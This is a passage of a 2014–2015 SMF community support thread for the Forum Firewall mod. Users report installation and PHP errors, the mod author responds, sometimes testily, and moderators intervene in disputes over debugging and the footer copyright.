You must be running an old version of this mod.  The issue with not recognizing some mobile device IP addresses was fixed with version 2.0.x of this mod.  The bypass check was totally re-written and all bugs were fixed with version 2.0.x of this mod.  If a mobile user faces the challenge, they have the option to enter their user name and password in the SMF login dialog (this will be added to SMF 2.1 too when it gets closer to release).  So please upgrade your FF mod. 
  :o
Please refresh your forum/ proxy/ server cache after making changes.  For more information see previous posts in this thread (start with the first one).
8)

That error did not show in any of the three sites until FF install.   ;)


The version is 2.0.1, downloaded here:

http://custom.simplemachines.org/mods/index.php?mod=2815

on Friday, Aug 22, 2014.  Is there a newer version?   :D
Title: Re: Forum Firewall
Post by: lc62003 on August 24, 2014, 11:51:31 PM
Or if this helps:  uncheck Disable evaluation of templates, then get the error:


8: Undefined index: cols
Apply Filter: Only show the errors from this file
File: /home/downhome/public_html/Themes/default/languages/Help.english.php (show_settings sub template - eval?)
Line: 910


Poking through the files, specifically /ForumFirewall.english.php,  where should

$txt['forumfirewall_admin_desc'] = 'Configure and Management';

be displayed in the settings?  I don't find "Configure and Management" anywhere in the admin panel. 
Title: Re: Forum Firewall
Post by: butchs on August 25, 2014, 08:29:24 PM
I do not use cols.  Please attach your "Help.english.php" file to a message.

$txt['forumfirewall_admin_desc'] can be found in "ForumFirewall-Admin.php" to display the settings.


Title: Re: Forum Firewall
Post by: lc62003 on August 25, 2014, 09:41:17 PM
Quote from: butchs on August 25, 2014, 08:29:24 PM
I do not use cols.  Please attach your "Help.english.php" file to a message.

$txt['forumfirewall_admin_desc'] can be found in "ForumFirewall-Admin.php" to display the settings.

The file is below of course.   ;D


Sorry, I asked the question the wrong way.  Where would that text be found while browsing through the ACP?  I can go to FF settings, Visitors, etc but never see that text unless I'm completely missing it.   :P

Are there any known mod collisions?  Sure this one doesn't use cols but uninstalling FF makes the error go away.  Reinstalling makes it return. 

If it helps the sites are all 2.0.8.  Here is a list of mods for one site:

1.    Forum Firewall    2.0.0    
2.    Tapatalk SMF 2.0 Plugin    4.1.0
3.    Resize Attached Images    2.4.1    
Title: Re: Forum Firewall
Post by: butchs on August 26, 2014, 06:02:06 PM
No such thing as mod collisions.

You understand that it takes time for your forum cache to reset by its self when you install a mod?  My site takes a day if I do not reset all cache.

"cols" is not in the help file you provided.  It is obvious you do n ot know how to locate errors.

Why are you you accusing my code of including an string/ variable that I told you I do not use?  I pride myself in debugging my code.  I stress test every function and debugged FF 2.0 as a whole for over six months.

I do not have the time to mess with other peoples mods.

Do a search for cols here you find link (http://www.simplemachines.org/community/index.php?topic=503954.msg3545782#msg3545782) and others.

I suggest you get some support from SMF on how to properly locate the errors and search for answers.
Title: Re: Forum Firewall
Post by: lc62003 on August 26, 2014, 09:29:05 PM
Quote from: butchs on August 26, 2014, 06:02:06 PM
No such thing as mod collisions.



So you're saying mods never, ever, interfere with one another?  It would be easy enough to post references to plenty of examples.  Excuse me if you don't like the term "collision". 


Quote from: butchs on August 26, 2014, 06:02:06 PM

You understand that it takes time for your forum cache to reset by its self when you install a mod?  My site takes a day if I do not reset all cache.


Yes, and since last Friday > the day you refer.


Quote from: butchs on August 26, 2014, 06:02:06 PM

"cols" is not in the help file you provided.  It is obvious you do n ot know how to locate errors.



Well, I'm no coder, that's why I installed your mod.  I've been successful at locating and repairing errors before, but since the same errors all magically appear on three different sites, all with different mods, it would seem logical to ask you about it.


Quote from: butchs on August 26, 2014, 06:02:06 PM

Why are you you accusing my code of including an string/ variable that I told you I do not use?  I pride myself in debugging my code.  I stress test every function and debugged FF 2.0 as a whole for over six months.


There are no accusations there.  I simply asked where I should expect to see that text when using the mod.  It was an attempt on my part to troubleshoot.  See above.


Quote from: butchs on August 26, 2014, 06:02:06 PM

I do not have the time to mess with other peoples mods.


No one asked you to do that.  I simply asked where to see that text.


Quote from: butchs on August 26, 2014, 06:02:06 PM

Do a search for cols here you find link (http://www.simplemachines.org/community/index.php?topic=503954.msg3545782#msg3545782) and others.

I suggest you get some support from SMF on how to properly locate the errors and search for answers.



So you don't want to help?  I already know how to get rid of the errors....uninstall this mod.  That isn't what I wish to do.  I would just like to get some help without basically being called a dumbass.   ;)
Title: Re: Forum Firewall
Post by: lc62003 on August 26, 2014, 09:53:42 PM
Maybe a pic will help.  Should there be text in the vicinity of the red arrow?


Title: Re: Forum Firewall
Post by: Arantor on August 26, 2014, 10:16:08 PM
If you're going to get rowdy with users, butchs, you would do well to listen to your own advice. The error given indicated eval? which means the actual location etc cannot be trusted.

However, the error is related to your mod. You are using the show_settings template with a large_text entry, which does use the cols item...

The lack of text up top would appear to be an extra bug.
Title: Re: Forum Firewall
Post by: butchs on August 26, 2014, 10:46:46 PM
Arantro, sorry but once again you are incorrect!  That box is intentionally blank when there are no errors.  See previous posts in this thread.  That area is reserved for when the mod detects a security issue with the host.  The mod has done this for many years with no errors.  If by a remote chance it has something to do with a call to a SMF function/ template, I can not support it as it is a SMF issue.  There is a limit to my madness, how much SMF code do I have to re-write before a mod is perfect?  Honestly I tried to help but... No more... Thanks to you, it is too much hassle for me so I will not fix any more SMF core code.

lc62003 whatever...  I refuse to waste my time giving free support to someone who wants to give me a hard time.  No free support for you for a week.
(http://www.seinfeldscripts.com/images/soupnazi.jpg)
Next time try to be more courteous when asking for FREE support.

Title: Re: Forum Firewall
Post by: Arantor on August 26, 2014, 11:02:22 PM
How am I incorrect? That box being empty was implied by lc62003 as a bug; it's inconsistent with how SMF does things, and to any observer it WOULD look like a bug to have an empty box up there.

I will do the debugging you are apparently incapable of. So, let's look at the error message - show_settings template, line 910. This is in Admin.template.php. And you're using show_settings, quite clearly. I would wonder why you are trying to 'fix core code' when the core code works just fine when called properly. I've never had any trouble with show_settings before.


Bonus error:
http://localhost/smf208/index.php?action=admin;area=packages;sa=install2;package=ForumFirewall_2.0.1.zip;pid=0
8: Undefined variable: port
Apply Filter: Only show the errors from this file File: C:/wamp/www/smf209/Packages/temp/ForumFirewall 2.0.1/install_db.php
Line: 621
Title: Re: Forum Firewall
Post by: Bigguy on August 26, 2014, 11:05:51 PM
I think this should stop now before this gets outta hand. The box that is being referred to works just fine. I have had this mod installed and uninstalled more times probably than anyone. When you have a server error and that box lights up you know what it's for. Maybe it should be labelled but other than that it does it's job.
Title: Re: Forum Firewall
Post by: lc62003 on August 26, 2014, 11:21:39 PM
Ok.  You're telling me precisely how to fix it then.  Uninstall x3.  It would be best if my sites do not link to yours nor should you get free Google hits from me either.  I was only asking simple questions.   I sincerely hope you find peace with whatever ails you. 
Title: Re: Forum Firewall
Post by: butchs on August 27, 2014, 05:39:01 PM
Arantor or ?, I have thousands of hours of my personal time into this mod.  How many times do I have to tell you that you do not have permission to edit my mod?

No support for you too for six days.  Now why not both of you get together and please come up with something I can repeat on my test server with the latest SMF 2.0.x, no mods installed using default theme.  I will look at it after your "cool down" period is over.

The purpose of the link is to send bad bots to me so I can edit the mod to protect users of my mod against the latest threats.  There was a time a few months ago where I was blocking well over 7,500 bots a week.

See yall in 6 days.  Have a happy holiday.  :)
Title: Re: Forum Firewall
Post by: Kindred on August 27, 2014, 06:01:09 PM
butchs...

Arantor did not edit your mod.  He pointed out a section of coding which appears to generate an error.

Now, whether it is completely due to this mod or an interaction with another mod is still unclear...   but the fact is - your mod could indeed be generating the undefined index when it calls the settings function, even within itself.
Title: Re: Forum Firewall
Post by: butchs on August 27, 2014, 06:31:29 PM
Quote from: Kindred on August 27, 2014, 06:01:09 PM
Now, whether it is completely due to this mod or an interaction with another mod is still unclear...   but the fact is - your mod could indeed be generating the undefined index when it calls the settings function, even within itself.

install_db.php is simply trying to configure the settings automatically in an effort to reduce user error during the first installation only.  It if fails, you may or may not get an error but the mod will still install.  There it could not find the server port so the data may not be loaded in the mod settings.  I recommend that all users review their setting and test the mod for two weeks before blocking is enabled.

What I did with my text box is grandfathered in and I have no intention of editing it for a error I can not repeat.

**  DELETED CONTENT **
Title: Re: Forum Firewall
Post by: Steve on August 28, 2014, 09:36:53 AM
Isn't there anyone who can put a stop to this nonsense?
Title: Re: Forum Firewall
Post by: Kindred on August 28, 2014, 10:09:02 AM
yup....

children - please stop.

Butchs - there is an issue.  without specific debugging, we don't know if it is your mod alone or your mod in combination with something else...

lc62003 - enough. You've had your say and uninstalled the mod. leave it at that, please.

Arantor has already maturely backed off

- so let's all move on.

Title: Re: Forum Firewall
Post by: butchs on August 28, 2014, 08:24:27 PM
I am the subject mater expert here.  I am the one who has spent countless hours writing software that protects its users.  My work has proven its self over the years by blocking millions of attacks.

As you know I do not make changes to my code without through testing.  I research and study the enemy.  I will not make a change unless I find a good reason.  I tested my last release many months before I made it official.  Version 1.0 took over 9 months to develop and test.  Seven months for version 2.0.

Just because someone gets an error in SMFs log the world will not end.  It does not mean your site will go down.  The mod will continue to do its job.  A SMF error can be caused by many things.  It can be a prelude to a hack attempt.  It can be a SMF bug.  It can be an outside source.  It could be your host.  Good grief...

I have seen bots hit code in certain code segments just to generate errors.  In some cases elimination of the error was to stop the bot, not to edit the code...  I have prevented many probing attempts over the years.  Results are the unique methods I created that are only available with my copyrighted software to protect your forum!

I am in a no win situation with many enemies.  There are many who want to bash my program with the hopes that it will not be used.  Get rid of the competition.  Self promote.  Destroy all those who oppose.  Tarnish a reputation.  Take over a site.   If it was me, I would find a way to create an error with the hope that the forum admin stops using the software just to gain access!!!

I can't read minds, do not throw rocks , I am way to busy, I can only help those who want to work as a team.
Title: Re: Forum Firewall
Post by: bud01100 on October 05, 2014, 02:08:01 AM
Running SMF 2.0.8 with Forum Firewall 2.0

I want to uninstall FF 2.0 to upgrade, but it doesn't give me an uninstall option in the package area; only an Upgrade option  List  and Delete.

When I click upgrade it says to uninstall it first.

Need help.

Thank you
Title: Re: Forum Firewall
Post by: butchs on October 05, 2014, 08:38:58 AM
Yea, you have to uninstall first. 

Sounds like a package manager issue.  My guess is that the zip file was accidentally deleted from the SMF/Packages folder?

Title: Re: Forum Firewall
Post by: bud01100 on October 05, 2014, 09:46:56 PM
Quote from: butchs on October 05, 2014, 08:38:58 AM
Yea, you have to uninstall first. 

Sounds like a package manager issue.  My guess is that the zip file was accidentally deleted from the SMF/Packages folder?



This is in the Packages Directory:

ForumFirewall_2.0.0.zip
Title: Re: Forum Firewall
Post by: butchs on October 06, 2014, 05:16:44 PM
You can try clicking the advanced tab in the lower right corner of package manager and adjust
Emulate Version.
Title: Re: Forum Firewall
Post by: huan on October 07, 2014, 02:56:01 PM
will it work with 2.09 ? want to install in my new board thank
getting issue on this file for my smf 2.09
./Themes/core/index.template.php failure
Title: Re: Forum Firewall
Post by: Bigguy on October 07, 2014, 04:18:53 PM
If you emulate 2.0.8 it should install fine.
Title: Re: Forum Firewall
Post by: huan on October 08, 2014, 11:38:17 AM
You mean downgrade to 2.08 ? will there be a latest release for 2.09
Title: Re: Forum Firewall
Post by: Kindred on October 08, 2014, 12:13:42 PM
Not downgrade... no one said downgeade

He said emulate.
Read the wiki/manual...
Title: Re: Forum Firewall
Post by: huan on October 08, 2014, 01:42:22 PM
QuoteGo to: Admin > Main > Packages > Browse Packages;
At the end of the page on the right, after the list of mods, click the link Advanced.

i tried to emulate to version 2.08 using aboive method but didnt seem to work
Title: Re: Forum Firewall
Post by: Bigguy on October 08, 2014, 04:04:34 PM
Did you try any other version or just 2.0.8 ??
Title: Re: Forum Firewall
Post by: butchs on October 08, 2014, 07:11:53 PM
I did not have a chance to test the the mod installation with SMF 2.0.9.  If you still have an issue please let me know by Friday and I will try installing it on my test server early Saturday morning.  A post here with a link to a picture of the error may be helpful.
Title: Re: Forum Firewall
Post by: huan on October 09, 2014, 02:43:30 PM
It showing file ./Themes/core/index.template.php failure 



i tried to emu to 2.07 also not working
Title: Re: Forum Firewall
Post by: Kindred on October 09, 2014, 03:06:36 PM
Emulate will not change file failures.  Emulate is used to force an installation if the mod was only designed gor a specific version.

File failures are usyally due to other mods already having changed the target code
Title: Re: Forum Firewall
Post by: butchs on October 09, 2014, 07:13:08 PM
Two common reasons for errors:
1.  Another mod using the same code space.
2.  A change in SMF in an area the mod uses.

The mod is developed for the default theme so that is all I can test against.  Making the mod compatible for other themes will be a never ending job for me.
Title: Re: Forum Firewall
Post by: Arantor on October 09, 2014, 09:35:00 PM
Of course, if you didn't insist on a footer copyright, you wouldn't have that problem.

Or, alternatively, you could instead do it with a replace in the buffer by starting another buffer, re-running theme_copyright(), ob_get_clean() that buffer, then do a str_replace on the master buffer (e.g. inside ob_sessrewrite), knowing full well you already know what markup you will be looking for to match against.

Or even doing it in JavaScript to find the element, as other mod authors have done.

But if you ever intend on 100% compatibility I guarantee you that that is not possible without dropping that code.
Title: Re: Forum Firewall
Post by: huan on October 10, 2014, 05:04:23 AM
Code: (Find) [Select]

echo '
      </div>
   </div></div>';

Code: (Replace) [Select]

echo '
      </div>
   </div></div>';

   if (!function_exists('FFCopyright')) {
      global $sourcedir;
      require_once($sourcedir . '/Subs-ForumFirewall.php'); }




this the error i have maybe the line cannot be found




i tried to ignore it and now i get those below error

32.    Execute Modification    ForumFirewall.xml    Modification parse error
   33.    Execute Modification    ForumFirewall.xml    Modification parse error
   34.    Execute Modification    modification_language.xml    Modification parse error
   35.    Execute Modification    modification_language.xml    Modification parse error
   36.    Execute Modification    modification_language_2x.xml    Modification parse error
   37.    Execute Modification    modification_language_2x.xml    Modification parse error
   38.    Adapt Database    install_db.php    Modification parse error
Title: Re: Forum Firewall
Post by: Kindred on October 10, 2014, 06:30:00 AM
Quote from: Kindred on October 09, 2014, 03:06:36 PM
File failures are usually due to other mods already having changed the target code
Title: Re: Forum Firewall
Post by: Arantor on October 10, 2014, 06:53:56 AM
Or in this case the initial error is caused by the theme doing something different to the default theme, which could go away if the footer copyright were not a thing.
Title: Re: Forum Firewall
Post by: Kindred on October 10, 2014, 09:17:22 AM
true.   alternate themes are always a pain to support (although, as you point out, inserting into the copyright instead of adding text to the copyright code would probably solve this issue)

I might point out that using the credits page would solve it even more...
Title: Re: Forum Firewall
Post by: butchs on October 10, 2014, 06:03:20 PM
Really how could that area effect security?

There is a simple solution in the mods help section:  "Copyright info & link must remain intact!  They only can be removed via Author/Creators approval or by providing a donation of $10 USD or more to the Author/Creator".  Now that I have the php based Challenge page completed maybe this winter I will do something cool with the copyright.

I will look at it tomorrow.
Title: Re: Forum Firewall
Post by: Arantor on October 10, 2014, 06:06:53 PM
We weren't talking about security. I was answering your complaint around 'making it work on themes'... if you remove the footer copyright, the entire issue goes away.
Title: Re: Forum Firewall
Post by: butchs on October 10, 2014, 06:11:43 PM
Sorry but no...  The footer helps me protect my users from the bots that click on it and come my way.
Title: Re: Forum Firewall
Post by: Arantor on October 10, 2014, 06:23:56 PM
In which case, I offered you alternative suggestions that would make your life easier for maintenance.
Title: Re: Forum Firewall
Post by: butchs on October 10, 2014, 06:57:30 PM
Didn't you forget no support 4 u?  :laugh:

Hunan - What theme are you using?
Title: Re: Forum Firewall
Post by: Kindred on October 10, 2014, 07:20:41 PM
Butch, no need to be rude..,  Arantor was not asking for support, he was giving a (good) suggestion in a way to deal with your issue with themes...   Either use a JavaScript,injection to put your copyright into the footer or (my suggestion) use the credits page, since that is what the credits page is for.
Title: Re: Forum Firewall
Post by: butchs on October 10, 2014, 07:34:56 PM
Ooooo I am tired of throwing out hints so here we go:  I am not interested in unsolicited advice on how to program.  If and when I get around to it I will do it my way.  Thank you.
Title: Re: Forum Firewall
Post by: Arantor on October 10, 2014, 07:39:18 PM
In which case, may you have so much fun with supporting themes in the meantime.
Title: Re: Forum Firewall
Post by: butchs on October 10, 2014, 07:51:43 PM
How many times do I need to say currently the mod supports only the default theme!  Otherwise the user can do a manual install.  So please stop bothering me.
Title: Re: Forum Firewall
Post by: Arantor on October 10, 2014, 07:53:22 PM
So why are you asking Huan what theme he is using if it's quite clear that the mod won't support it without manual edits which you are apparently not going to do?

I was trying to make your life easier, sorry to actually want to try to mend a bridge for once.
Title: Re: Forum Firewall
Post by: Kindred on October 10, 2014, 08:01:10 PM
Butch, I am sorry, but in this case YOU are being completely unreasonable. Arantor made a very valid suggestion on how you could resolve an issue that many people seem to be having...  Especially since the majority of admins do not use the default theme.

Additionally, I also made a valid suggestion that you should be using the credits page instead of adding your own separate copyright...  I have made the same suggestion to others as well.  It is not currently a requirement for the mod to be here... But I suspect that a time in coming at which point we will expect authors to use the credits page as it was intended and to stop adding thirteen copyright statements at the footer.
Title: Re: Forum Firewall
Post by: butchs on October 10, 2014, 08:45:20 PM
You are being unreasonable insisting I do something now that I am not prepared to do, nor interested in doing at this time.  Now if you really want me to stop what I am doing and do what you want then please send me money.  PM me for my rate...
Title: Re: Forum Firewall
Post by: Kindred on October 10, 2014, 08:49:08 PM
No one has insisted that you do anything...

There have been two SUGGESTIONS on a better way than you are currently using to deal with the situation.
Title: Re: Forum Firewall
Post by: huan on October 10, 2014, 11:49:14 PM
my main concern is to get it work on my new forum
the theme is the default theme no other mod installed as it new , so the first mod i plan to install is the forum firewall :p

Title: Re: Forum Firewall
Post by: butchs on October 11, 2014, 09:12:16 AM
It was time I wiped my SMF 2.0.8  test forum anyway.  Though I uninstalled all my mods there appeared to be legacy changes left over from live edits.  Since my background was not from the default theme.

So I download "smf_2-0-9_install.zip".  Replaced index.php, ssi_example.php, ssi_example.shtml, SSI.php and subscriptions.php (NOTsettings.php).  Then I completely erased then re-downloaded the cache, Packages, Smileys, Sources and Themes folders along with their complete contents.  Then I copied the files from the attachments and avatars folders (retaining the files for the members).

I restarted the forum and uploaded "Forum Firewall 2.0.1" in package manager.  There were no issues with the installation.
Title: Re: Forum Firewall
Post by: huan on October 12, 2014, 08:42:06 PM
32.    Execute Modification    ForumFirewall.xml    Modification parse error
   33.    Execute Modification    ForumFirewall.xml    Modification parse error
   34.    Execute Modification    modification_language.xml    Modification parse error
   35.    Execute Modification    modification_language.xml    Modification parse error
   36.    Execute Modification    modification_language_2x.xml    Modification parse error
   37.    Execute Modification    modification_language_2x.xml    Modification parse error


i still getting this error anyone any idea how to fix this ?
Title: Re: Forum Firewall
Post by: huan on October 12, 2014, 08:54:19 PM
Quote from: sinnerman on June 11, 2014, 04:12:04 AM
Hi guys,

I'm trying to install this mod on a dedicated server with SMF 2.0.7. When i browse the mods and find it, it says the package is empty and i should upload the files myself.

When i upload the files myself and try to install i get:
Error in Package Installation
At least one error was encountered during a test installation of this package. It is strongly recommended that you do not continue with installation unless you know what you are doing, and have made a backup very recently. This error may be caused by a conflict between the package you're trying to install and another package you have already installed, an error in the package, a package which requires another package that you don't have installed yet, or a package designed for another version of SMF.

and in particular:
31.   Execute Modification   ForumFirewall.xml   Modification parse error
32.   Execute Modification   ForumFirewall.xml   Modification parse error
33.   Execute Modification   modification_language.xml   Modification parse error
34.   Execute Modification   modification_language.xml   Modification parse error
35.   Execute Modification   modification_language_2x.xml   Modification parse error
36.   Execute Modification   modification_language_2x.xml   Modification parse error

any ideas?

EDIT: just a simple chmod solved the issue. Sorry. :)


bro which chmod option are you refer to ?
Title: Re: Forum Firewall
Post by: bud01100 on October 13, 2014, 06:38:35 AM
Quote from: butchs on October 06, 2014, 05:16:44 PM
You can try clicking the advanced tab in the lower right corner of package manager and adjust
Emulate Version.

I tried that 2.08 and down.. No avail?

What next?
Title: Re: Forum Firewall
Post by: butchs on October 13, 2014, 05:57:40 PM
A few posts ago you said you were using the default theme with no other mods installed.  If this is the case you should have no issues.  Your files have been edited?  It maybe is a good idea to replace the SMF specific files as I did a few posts ago.  When you are done check your hosts chmod settings.  I have to manually adjust mine all the time.

Title: Re: Forum Firewall
Post by: butchs on October 16, 2014, 08:46:48 PM
I kinda think Themes are a waste.  I created an entire site mod back in 2008 where all my changes (and bug fixes) are done with a single mod.  It is so much cleaner that some have copied my idea.  Once you get a site mod working it is easily updated to changes in the SMF core...
Title: Re: Forum Firewall
Post by: bud01100 on October 20, 2014, 05:24:33 PM
Quote from: bud01100 on October 05, 2014, 02:08:01 AM
Running SMF 2.0.8 with Forum Firewall 2.0

I want to uninstall FF 2.0 to upgrade, but it doesn't give me an uninstall option in the package area; only an Upgrade option  List  and Delete.

When I click upgrade it says to uninstall it first.

Need help.

Thank you


Hi..

There has been a lot of chat here, but I am still looking for some direction on how to uninstall the noted version.

Thanks!
Title: Re: Forum Firewall
Post by: butchs on October 20, 2014, 07:44:27 PM
I really do not know what to tell you.  The mod uninstalls from the default theme by its self with no issues.   I only programmed uninstall and install in the mod for a reason.  The upgrade option does nothing and will only give you a message.   This is more a SMF issue than a mod issue.  My guesses:

1.  You grabbed a beta from another site.
2.  The zip file in the package directory is corrupt or non-existent.
3.  Your version is old and you need to emulate the SMF version.
4.  SMF somehow became corrupt at your site.  Could be a mod you installed and uninstalled out of order, an outside source, accidental keystroke while editing something and etc.  If items 1-3 do not work then I recommend to replace your forum software with a fresh version and check your hosts security (as I mentioned above and whatever SMF recommends).  As long as your keep your settings (and whatever your site needs - see the SMF install instructions for details) intact and your DB is still intact then all your mod settings will remain.  When you re-install mods take note of the order they are installed so you un-install in the exact same order to prevent write over conflicts.   I suggest assigning prefix numbers to your mods zip file prior to installation (i.e. 01_modname.zip, 02_modname1.zip and etc).

I wish I had some miracle fix but alas that is all I have...




Title: Re: Forum Firewall
Post by: adkaraczun on November 19, 2014, 02:06:22 PM
Version 2.0.1 installed successfully, but when I try to configure the settings and click "Save" I get the following error page.

I have tried all the suggestions and nothing seems to work.

QuoteThis webpage is not available

Hide details
The connection to mischiefinc.net was interrupted.
Reload this webpage
Press the reload button to resubmit the data needed to load the page.
Check your Internet connection
Check any cables and reboot any routers, modems, or other network devices you may be using.
Allow Chrome to access the network in your firewall or antivirus settings.
If it is already listed as a program allowed to access the network, try removing it from the list and adding it again.
If you use a proxy server...
Check your proxy settings or contact your network administrator to make sure the proxy server is working. If you don't believe you should be using a proxy server: Go to the Chrome menu > Settings > Show advanced settings... > Change proxy settings... > LAN Settings and deselect "Use a proxy server for your LAN".
Error code: ERR_CONNECTION_RESET
Title: Re: Forum Firewall
Post by: butchs on November 23, 2014, 08:48:15 AM
Sounds like your hosts firewall  (ie Modsecurity in Apache) is blocking the save because it contains  something it is flagging.  You can have you host adjust or you can manually edit the content by accessing the DB directly.
Title: Re: Forum Firewall
Post by: snayeem101 on November 25, 2014, 03:06:04 AM
I do not see protected by forum firewall tags in footer of my forum. I do not change default settings. Which options must be enable for better protecting? Please give me suggestions. thanks
Title: Re: Forum Firewall
Post by: butchs on November 25, 2014, 08:21:05 PM
Posting here and sending me a message at the same time is a waste of effort.  Did you read the first post in this thread?
Title: Re: Forum Firewall
Post by: snayeem101 on November 25, 2014, 11:40:28 PM
FF-Language installed error problem

An Error Has Occurred!
Package upload failed due to the following error:
"Although the package was downloaded to the server it appears to be empty. Please check the Packages directory, and the "temp" sub-directory are both writable. If you continue to experience this problem you should try extracting the package on your PC and uploading the extracted files into a subdirectory in your Packages directory and try again. For example, if the package was called shout.tar.gz you should:
1) Download the package to your local PC and extract it into files.
2) Using an FTP client create a new directory in your "Packages" folder, in this example you may call it "shout".
3) Upload all the files from the extracted package to this directory.
4) Go back to the package manager browse page and the package will be automatically found by SMF."
Title: Re: Forum Firewall
Post by: butchs on November 26, 2014, 08:15:10 PM
Whatever you do not install an incomplete package.   The files here were checked after uploading and others have used them.  You may want to try re-downloading the files from SMF and try again as per the instructions.
Title: Re: Forum Firewall
Post by: snayeem101 on November 27, 2014, 05:03:19 AM
Quote from: butchs on November 26, 2014, 08:15:10 PM
Whatever you do not install an incomplete package.   The files here were checked after uploading and others have used them.  You may want to try re-downloading the files from SMF and try again as per the instructions.

Site test: ipv6 failed to resolve. ipv4 valid.

FF_language not upload. Main Mod uploading and installed. But protected by forum firewall not showing in footer tags. Please check my forum eduforumbd.com .
Title: Re: Forum Firewall
Post by: snayeem101 on November 27, 2014, 05:55:22 AM
Please download the attachment file, there has installation process screenshot
Title: Re: Forum Firewall
Post by: butchs on November 27, 2014, 09:27:19 AM
Quote from: snayeem101 on November 27, 2014, 05:03:19 AM

Site test: ipv6 failed to resolve. ipv4 valid.

FF_language not upload. Main Mod uploading and installed. But protected by forum firewall not showing in footer tags. Please check my forum eduforumbd.com .

The mod works with either or both ipv4 and ipv6.

Did you test and then enable the mod and turn on block violations?  Read the first post in this thread.

It is recommended that you do not enable "Block Violations" until after you operated the mod for several days and you are fully confident that there are no infractions in the visitor logs that can deny you or your top members access.

Quote from: snayeem101 on November 27, 2014, 05:55:22 AM
Please download the attachment file, there has installation process screenshot

Come on guy.  This is more a newbie SMF question not a support question.   Looking at your first image the mod installed perfectly on the default theme.  The default theme is what is designed to install on.  All other themes may require manual installation.  The two (2) errors are from other themes and has no affect on the default installation.  Both core and mobi-desktop (if you use them - usually not) will require manual change to the red files.
Title: Re: Forum Firewall
Post by: snayeem101 on November 27, 2014, 11:59:34 AM
Quote from: butchs on November 27, 2014, 09:27:19 AM
Quote from: snayeem101 on November 27, 2014, 05:03:19 AM

Site test: ipv6 failed to resolve. ipv4 valid.

FF_language not upload. Main Mod uploading and installed. But protected by forum firewall not showing in footer tags. Please check my forum eduforumbd.com .

The mod works with either or both ipv4 and ipv6.

Did you test and then enable the mod and turn on block violations?  Read the first post in this thread.

It is recommended that you do not enable "Block Violations" until after you operated the mod for several days and you are fully confident that there are no infractions in the visitor logs that can deny you or your top members access.

Quote from: snayeem101 on November 27, 2014, 05:55:22 AM
Please download the attachment file, there has installation process screenshot

Come on guy.  This is more a newbie SMF question not a support question.   Looking at your first image the mod installed perfectly on the default theme.  The default theme is what is designed to install on.  All other themes may require manual installation.  The two (2) errors are from other themes and has no affect on the default installation.  Both core and mobi-desktop (if you use them - usually not) will require manual change to the red files.

Many Many thanks. Finally i can successfully installed it. One question- Do i need to change default settings and which options? I just mark the User agent inspection and doss attack . Others setting remain default.

Title: Re: Forum Firewall
Post by: butchs on December 04, 2014, 07:29:37 PM
In order to actually benefit from ddos protection you need to set-up robots.text as per the instructions linked on page 1 of this thread.
Title: Re: Forum Firewall
Post by: mehrtadbir on December 05, 2014, 04:15:18 PM
Hello to all

Thank you butchs I understand you have a little time so I share a little experience with others .
I've used most of DzinerStudio (http://www.dzinerstudio.com/) themes.

If we extract this Mod and replace

<file name="$themedir/index.template.php">

<operation>
<search position="replace"><![CDATA[// Show the "Powered by" and "Valid" logos, as well as the copyright.]]></search>
<add><![CDATA[
if (!function_exists('FFCopyright')) {
global $sourcedir;
require_once($sourcedir . '/Subs-ForumFirewall.php'); }

// Show the "Powered by" and "Valid" logos, as well as the copyright.]]></add>
</operation>

<operation>
<search position="replace"><![CDATA[theme_copyright(),]]></search>
<add><![CDATA[theme_copyright(), FFCopyright(),]]></add>
</operation>
</file>


With this code

<file name="$themedir/index.template.php">

<operation>
<search position="replace"><![CDATA[echo '
</div>
</div></div>';]]></search>
<add><![CDATA[echo '
</div>
</div></div>';

if (!function_exists('FFCopyright')) {
global $sourcedir;
require_once($sourcedir . '/Subs-ForumFirewall.php'); }]]></add>
</operation>


in ForumFirewall.xml file We can install it on default them and most of DzinerStudio (http://www.dzinerstudio.com/) themes. I've attached This Mod that contains the changes.

                                                                                                                                                                Good luck
Title: Re: Forum Firewall
Post by: Bigguy on December 05, 2014, 11:19:18 PM
Did butchs give permission to you to edit his mod and re-package it. ?? Just thought I would ask.
Title: Re: Forum Firewall
Post by: Kindred on December 06, 2014, 12:12:53 AM
Attachment removed...
Title: Re: Forum Firewall
Post by: mehrtadbir on December 06, 2014, 06:39:59 AM
Ohhh   

Quote from: Bigguy on December 05, 2014, 11:19:18 PM
Did butchs give permission to you to edit his mod and re-package it. ?? Just thought I would ask.
I 'm sorry, I did not know that I must do. My goal was just to help.
If true, He will apply the change.

Quote from: Kindred on December 06, 2014, 12:12:53 AM
Attachment removed...
Very Thanks Kindred
Title: Re: Forum Firewall
Post by: crazyearner on January 04, 2015, 08:46:12 PM
Hello butchs I have a small problem when trying to save settings for forum firewall to take effect.  I have installed mod and said everything was test success and no errors. I continued to install redirected to settings page and enabled settings I want on. When coming to save settings I get the following error code.

The requested page "/forums/index.php?action=admin;area=forumfirewall;save;sa=settings" could not be found.

Any help or advise on how to fix this problem. Thanks in advance.
Title: Re: Forum Firewall
Post by: butchs on January 05, 2015, 06:31:39 PM
Crazy,
I seen that before.  Check out reply 938 (http://www.simplemachines.org/community/index.php?topic=417490.msg3765642#msg3765642).
Title: Re: Forum Firewall
Post by: awolexpat on January 10, 2015, 05:35:48 AM
Hi butchs,
I've searched this thread and found only one reference to an error I am seeing in my logs which has only started appearing since updating to the latest version of your mod; as far as I can see no answer was given regarding it but my apologies if i missed it. I imagine it might have something to do with either another mod or the settings but any hint you can give me to track down the cause will be very gratefully received.
The errors are:
8: Undefined offset: 1
File: public_html/forum/Themes/default/ForumFirewall_Challenge.template.php
Line: 137

and the same error referencing line 135.

These all seem to be only being triggered by Guests. In one day there have been 190 each of these.

I am also getting the following on the top of the Settings page; SECURITY RISK: ENSURE ALLOW_URL_FOPEN AND ALLOW_URL_INCLUDE ARE BOTH DISABLED TO PROTECT AGAINST RFI!
My .htaccess has these turned off, but as I suspect this can't actually be turned off in .htaccess because of the PHP version my host runs (5.4.35) I have also added a php.ini file turning these off, but the message is still there.

These may be connected issues but any assistance you can offer would be appreciated.
Title: Re: Forum Firewall
Post by: butchs on January 10, 2015, 10:08:43 AM
Interesting, this means the challenge page is getting hit by bots.  After we clear up this error I will be interested in seeing your Challenges log...

Try to replace:
echo ' <div class="ff_border' . ($myCtr/2-1) . '"><ul><li class="ff_content_b">';
                for ($ff_Ctr = 1; $ff_Ctr < $myCtr+1; $ff_Ctr++) {
